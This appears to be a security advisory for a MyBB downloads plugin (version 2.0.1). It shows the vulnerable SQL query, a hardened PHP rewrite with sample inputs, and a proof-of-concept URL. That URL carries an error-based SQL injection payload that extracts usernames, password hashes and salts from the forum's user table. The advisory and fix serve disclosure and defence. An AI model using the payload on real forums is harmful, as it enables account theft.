# Version: 2.0.1
Introduction
------------
The plugin helps with downloading files on MyBB forums.
SQL injection
-------------
inc/plugins/downloads.php L.30
$qdownloads = $db->simple_select('downloads', '*', 'did="'.$mybb->input['newimages'].'"');
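A hardened form of this lookup, as an added example that is not the plugin's own code. It assumes `did` is an integer key (the page does not show the schema); `downloads_parse_did`, `downloads_lookup` and the `RecordingDb` stand-in are hypothetical names introduced here.

```php
<?php
// Added example: hardened form of the lookup at inc/plugins/downloads.php L.30.
// Assumption: `did` is an integer primary key (the page does not show the schema).

/** Return the id as an int, or null if the input is not a plain decimal number. */
function downloads_parse_did($raw)
{
    // $mybb->input values can be arrays (newimages[]=x), so require a string first.
    // \A and \z anchor the whole value; 9 digits keeps the cast safe on 32-bit PHP.
    if (!is_string($raw) || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    return (int)$raw;
}

/** Run the lookup only when the id validated; the condition never holds raw input. */
function downloads_lookup($db, $raw)
{
    $did = downloads_parse_did($raw);
    if ($did === null) {
        return false; // caller treats this as "no such download"
    }
    return $db->simple_select('downloads', '*', 'did='.$did);
}

// Constructed stand-in for MyBB's $db so this file runs on its own under the PHP CLI.
// It only echoes back the query it would have been asked to run.
class RecordingDb
{
    public function simple_select($table, $fields = '*', $conditions = '')
    {
        return "SELECT {$fields} FROM {$table} WHERE {$conditions}";
    }
}

// Constructed sample inputs: a valid id, a shortened form of the quote-breaking
// value from the proof of concept, an array, an empty string, an over-long number.
$db = new RecordingDb();
$samples = array('17', '1" and (select 1)-- -', array('1'), '', '99999999999');
foreach ($samples as $raw) {
    $result = downloads_lookup($db, $raw);
    echo json_encode($raw), ' => ', $result === false ? 'rejected' : $result, "\n";
}
```

Inside the plugin the call would be `downloads_lookup($db, isset($mybb->input['newimages']) ? $mybb->input['newimages'] : '')`. For a column that really is a string, keep the quotes in the condition and pass the value through `$db->escape_string()` instead of casting.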
Proof of concept
----------------
Error-based injection: http://[site]/downloads.php?newimages=1%22%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho